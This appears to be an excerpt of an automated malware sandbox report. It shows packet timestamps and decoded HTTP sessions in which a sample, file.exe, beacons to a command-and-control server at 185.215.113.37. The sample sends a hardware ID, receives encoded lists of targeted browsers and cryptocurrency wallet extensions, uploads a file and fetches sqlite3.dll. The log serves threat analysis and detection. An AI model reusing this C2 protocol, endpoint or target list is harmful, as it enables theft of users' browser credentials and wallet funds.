Oct 24, 2024 13:02:20.818571091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818588972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:21.421024084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:21.421060085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:21.426462889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:21.426600933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.205852032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.205916882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.248354912 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.253859997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.534691095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.534734964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.534775972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.534806013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.534811020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.534862041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.534862041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.534862041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.537347078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.542850971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.822642088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:22.822710991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.832777977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:22.838143110 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:23.770083904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:23.770227909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:23.813695908 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:23.819240093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103723049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103737116 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103751898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103806973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103797913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:24.103818893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103873014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:24.103873968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:24.103883982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103895903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.103929996 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:24.103949070 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:24.105417013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:24.110747099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.881712914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:24.881793022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:30.045332909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:30.047038078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:30.839831114 CEST	49711	80	192.168.2.6	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	185.215.113.37	80	6432	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:02:02.501748085 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:02:03.418757915 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:03.424633980 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 38 38 45 39 42 41 30 33 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"AB88E9BA03AD2322695909------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"doma------AFHDAKJKFCFBGCBGDHCB--
Oct 24, 2024 13:02:03.724419117 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 54 51 77 4f 47 51 35 59 6a 4e 69 4e 7a 6c 68 4e 32 4a 68 59 7a 49 79 4d 47 4d 77 4e 6d 46 6a 4f 47 52 6b 4d 44 42 6a 4d 54 41 31 5a 54 64 6c 5a 54 64 6c 4f 44 4a 69 5a 47 4e 6a 59 7a 64 69 59 54 6b 30 5a 47 49 78 5a 54 4a 6d 4d 7a 51 34 4f 54 67 34 4d 44 46 69 4d 47 45 30 4d 6a 4a 68 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZTQwOGQ5YjNiNzlhN2JhYzIyMGMwNmFjOGRkMDBjMTA1ZTdlZTdlODJiZGNjYzdiYTk0ZGIxZTJmMzQ4OTg4MDFiMGE0MjJhfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 24, 2024 13:02:03.725522995 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"browsers------JKECFCFBGDHIECAAFIID--
Oct 24, 2024 13:02:04.011425018 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 24, 2024 13:02:04.011450052 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 24, 2024 13:02:04.012938023 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="message"plugins------IEHCBAFIDAECBGCBFHJE--
Oct 24, 2024 13:02:04.299578905 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 24, 2024 13:02:04.299603939 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 24, 2024 13:02:04.299618006 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 24, 2024 13:02:04.299631119 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 24, 2024 13:02:04.299642086 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 24, 2024 13:02:04.299654007 CEST	960	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Oct 24, 2024 13:02:04.300106049 CEST	204	IN	Data Raw: 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 74 6f 61 47 70 6a 61 47 74 72 61 47 31 70 5a 32 64 68 61 32 6c 71 62 6d 74 6f 5a 6d 35 6b 66 44 46 38 4d 48 77 77 66 45 31 35 56 47 39 75 56 32 46 73 62 47 56 30 66 47 5a 73 5a 47 5a 77 5a 32 Data Ascii: bGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJkbm5pbG1jZGNnfDF8MHwwfA==
Oct 24, 2024 13:02:04.301877975 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 2d 2d 0d 0a Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="message"fplugins------HCBAKJEHDBGHIEBGCGDG--
Oct 24, 2024 13:02:04.587943077 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 24, 2024 13:02:04.607732058 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEB Host: 185.215.113.37 Content-Length: 6371 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:02:04.607774019 CEST	6371	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 Data Ascii: ------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 24, 2024 13:02:05.656740904 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:05.882857084 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
